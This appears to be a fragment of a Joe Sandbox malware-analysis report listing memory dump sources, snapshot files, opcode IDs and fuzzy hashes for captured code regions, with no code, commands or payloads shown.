                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fbf870c759b9e45c80f5f68f9ba7923fe93fc0d65348923bd2fe42f0c897c79b
                                                                  • Instruction ID: a00433d6f99517f6a09a10b9551b3bb009fc363ee4d1aa6d3e8717ae44f3cebd
                                                                  • Opcode Fuzzy Hash: fbf870c759b9e45c80f5f68f9ba7923fe93fc0d65348923bd2fe42f0c897c79b
                                                                  • Instruction Fuzzy Hash: BA22B720B19A494FE798FB78447A6B977E2FF98714F450579E04EC32FBDE28A8018741
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ca87ac3d295152ad723bfa09e8e45a63fb7d02bcf7e07cdd83933b29886da9d4
                                                                  • Instruction ID: acd76dba7f88819f08bb5cd383f424e61e5c1853e2c5ba5d59ffb747ab705033
                                                                  • Opcode Fuzzy Hash: ca87ac3d295152ad723bfa09e8e45a63fb7d02bcf7e07cdd83933b29886da9d4
                                                                  • Instruction Fuzzy Hash: EC22F621B19A4D4BE7A8FB78447AABC77E2EF98714F4505B9E04DC32FBDD2868018741
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f7fc962fb4499aa838e6c3649887e88fba1681fd2942561d2e47e21545315b85
                                                                  • Instruction ID: 4f36e2ee215e9d09d5e7a0e0fe9bfc90bb3b6e7a7be3cc2afb8e4599bebfdaee
                                                                  • Opcode Fuzzy Hash: f7fc962fb4499aa838e6c3649887e88fba1681fd2942561d2e47e21545315b85
                                                                  • Instruction Fuzzy Hash: 52512620B0E78A0FE756AB7888666B53BE1DF8621474901FBD08DC71FBCD1CAC428352
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a8ccce30f4e89ddd77d02043c1478ca306c9a7c0685899aa663d8fecca7a2ce
                                                                  • Instruction ID: df26e4a8cec3046f570515632c90a34925ecb00c5805b2ab90ef5325df709357
                                                                  • Opcode Fuzzy Hash: 4a8ccce30f4e89ddd77d02043c1478ca306c9a7c0685899aa663d8fecca7a2ce
                                                                  • Instruction Fuzzy Hash: EB310911F18A494FEB44BBBC586A7BD77E2EF98715F0502B6E00CC32E7DE2858018392
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9aee4e827ac141f231997a3b8df4dffb74c5bd846a1d8e49ef34c1b00b781b95
                                                                  • Instruction ID: 43985037066eb342cb6d4069d8a8edd5eb7da795fbaf04cf5c1a4fd14259868b
                                                                  • Opcode Fuzzy Hash: 9aee4e827ac141f231997a3b8df4dffb74c5bd846a1d8e49ef34c1b00b781b95
                                                                  • Instruction Fuzzy Hash: F5319134B19A4D8FDB48EBA8C465AADB7A2FF98311F5145B9D009D32DACE3868018751
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ff4866b3da3187588dbffdad3b7037f712896a00b746d989ae926e63a29e37af
                                                                  • Instruction ID: 9cdd809ac0421dc018874f94567ad1d2688480520567cfe705e021ad58b03c90
                                                                  • Opcode Fuzzy Hash: ff4866b3da3187588dbffdad3b7037f712896a00b746d989ae926e63a29e37af
                                                                  • Instruction Fuzzy Hash: A5215220B1C9494FD788EF6C946A778B2C2EF98315F4545BEA05EC32EBDD68AC418741
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e553f64de85dc406b5cd47a167e769b960a8bfdc1e659c3d7c0f441fddcbb86
                                                                  • Instruction ID: 1f4a0be5362e269fe767059b354548fe82bcf6a0a1afac61d9d0fab7fed392a9
                                                                  • Opcode Fuzzy Hash: 0e553f64de85dc406b5cd47a167e769b960a8bfdc1e659c3d7c0f441fddcbb86
                                                                  • Instruction Fuzzy Hash: 01310174748A8D8FD388EB2880A4DADBF62AFC9225B8148E9D418D73DFCD3C5901C761
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e3b9b23995761c4b006e337b99b0f1d1b4c798e9109858d00a8e824fec26a019
                                                                  • Instruction ID: 1a3a1c7bb0f0bff9c87272356b25c171aaaa51faadcf2f575b91fa859aa4c712
                                                                  • Opcode Fuzzy Hash: e3b9b23995761c4b006e337b99b0f1d1b4c798e9109858d00a8e824fec26a019
                                                                  • Instruction Fuzzy Hash: 6B017654A0EB890FE365A6385876471BFE1CFD6210B0901ABE88CC61F7E808AA448392
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2368405484.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffd9b7e0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <N_^$=N_^$N_^j$N_^p
                                                                  • API String ID: 0-2936155160
                                                                  • Opcode ID: 0df6d2afe4ec58165106d27296bf85d81256365d4a325b4d8c97cef035abf6b5
                                                                  • Instruction ID: 1291cb9629d4be3418f3983f6a397094e2b3d3216c73efc85c66cc911c0368b9
                                                                  • Opcode Fuzzy Hash: 0df6d2afe4ec58165106d27296bf85d81256365d4a325b4d8c97cef035abf6b5
                                                                  • Instruction Fuzzy Hash: E9315DABF4E55A0AE31272EC68765EC37909F8073971A8572C2ADDA1F3CC1430464692
                                                                  Memory Dump Source
• Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7547470955abf1a9ca69ed2df63400d524b2719175600e6923d077e96716f281
• Instruction ID: 8b2641a206e1cbd7f0ed8c92ced4ea65b250a4a87e5515e53923e2cb1d301185
• Opcode Fuzzy Hash: 7547470955abf1a9ca69ed2df63400d524b2719175600e6923d077e96716f281
• Instruction Fuzzy Hash: 6F220721F19A894BE768FB6C5479ABC7BD1EF94314F4546B9E04DC32E7DD28A8014381

Memory Dump Source
• Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2c246bbcca690dd739408cf9f853f39ca7a7befeddbd80d68ac735ba936130b3
• Instruction ID: b5207b5842d027ebaa3c3eeac7e5b8aa630748c668a951d40326cf0e8387fcb6
• Opcode Fuzzy Hash: 2c246bbcca690dd739408cf9f853f39ca7a7befeddbd80d68ac735ba936130b3
• Instruction Fuzzy Hash: AB22D760B19B494FE798EB7C84796BD7BD1FF98310F4505B9E04EC32E6DD28A8018781

Memory Dump Source
• Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ec1d4ba58a28cee4869b51b6865fe5388e040653eb09a32b9e29afc2d5a9eb11
• Instruction ID: 6654396d656962bc32b4978ad436145cfa2366e3f40d746bd0f20927f2ff3d5f
• Opcode Fuzzy Hash: ec1d4ba58a28cee4869b51b6865fe5388e040653eb09a32b9e29afc2d5a9eb11
• Instruction Fuzzy Hash: 4812E821F19A494BE7A8EB7C5479ABC7BD1FF98310F4505B9E04EC32E7DD28A8018781

Memory Dump Source
• Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b83c0ec7f5058b9a9b9ddc81b15eefd6b6522ebbc5f9bf18b0c118606d9101bc
• Instruction ID: df80337c3597060a2938b827f56ae8e6181ca011664ebed9fcf2ed636ede7d0e
• Opcode Fuzzy Hash: b83c0ec7f5058b9a9b9ddc81b15eefd6b6522ebbc5f9bf18b0c118606d9101bc
• Instruction Fuzzy Hash: CFD14826F0D6994BD764FBBCA479AFD3BA0EF84324B4546B9E05DC71E3DC1868018780

Memory Dump Source
• Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4c0c97a37d71cf1bb9e65855d01c0e3198d20ce422f9c276f6c7ce6452db9f11
• Instruction ID: fe84e0507ebdf423db87c98ba1a4a446c133dbd397c94bdba5399e727bf9d293
• Opcode Fuzzy Hash: 4c0c97a37d71cf1bb9e65855d01c0e3198d20ce422f9c276f6c7ce6452db9f11
• Instruction Fuzzy Hash: 31510620B0E7CA0FE756AB7898656B57FE1DF8621474901FBD48DC72EBCD18AC428352

Memory Dump Source
• Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 74861c5b6bcaabd9c38614c637be1b4ed299d2d5a82303e58ee00a8be350ec2b
• Instruction ID: 879d763f58f6b617892d41a78e4adf72bebd74b2930531c2375b81262c93e0eb
• Opcode Fuzzy Hash: 74861c5b6bcaabd9c38614c637be1b4ed299d2d5a82303e58ee00a8be350ec2b
• Instruction Fuzzy Hash: 40310921F19A4A4FE744BFBC48696BC77E2EF98715F0503B6E01CC32E6DE2858018392

Memory Dump Source
• Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8833b229df6a483f36344ae61209d6080a799585aafeb715f5ea9dfd61278024
• Instruction ID: 07c68be7c43c6b589c1ebd1fc550ea80e63d8ff6679d8d2e55ad092b897866e2
• Opcode Fuzzy Hash: 8833b229df6a483f36344ae61209d6080a799585aafeb715f5ea9dfd61278024
• Instruction Fuzzy Hash: 7831D234B18A4D8FDB44EBA8D465AEDBBB1FF98310F4405B8D019C73D6DE38A8018780

Memory Dump Source
• Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e5a53fa0dfd550c3c5fa3de538a804dfbab7edd5f7427fdb45fac3c87a792a86
• Instruction ID: 3354b5a2391ae2c3e6be98cf0e064903ddf965df0b19a25192da406ab2e3bbe2
• Opcode Fuzzy Hash: e5a53fa0dfd550c3c5fa3de538a804dfbab7edd5f7427fdb45fac3c87a792a86
• Instruction Fuzzy Hash: 3D31F23475DA8D4FD344EF2CA4A4DAA7F71AF8932078544E5D458CB3DBCD28A902C751

Strings
Memory Dump Source
• Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
Similarity
• API ID:
• String ID: <M_^$=M_^$M_^j$M_^p
• API String ID: 0-3547729567
• Opcode ID: 94bde1aa506ee9daf63da347d970920297bbcdf60167c394250fa25fe49f358e
• Instruction ID: 437c6c835e2d4413b3a321e204eb7f50774393548620ce426e0885ba3bfb9231
• Opcode Fuzzy Hash: 94bde1aa506ee9daf63da347d970920297bbcdf60167c394250fa25fe49f358e
• Instruction Fuzzy Hash: 14318FABF0D59A89E61276EC64665EC3B909F8073971B83F2C07DCA2E3DC14304645E5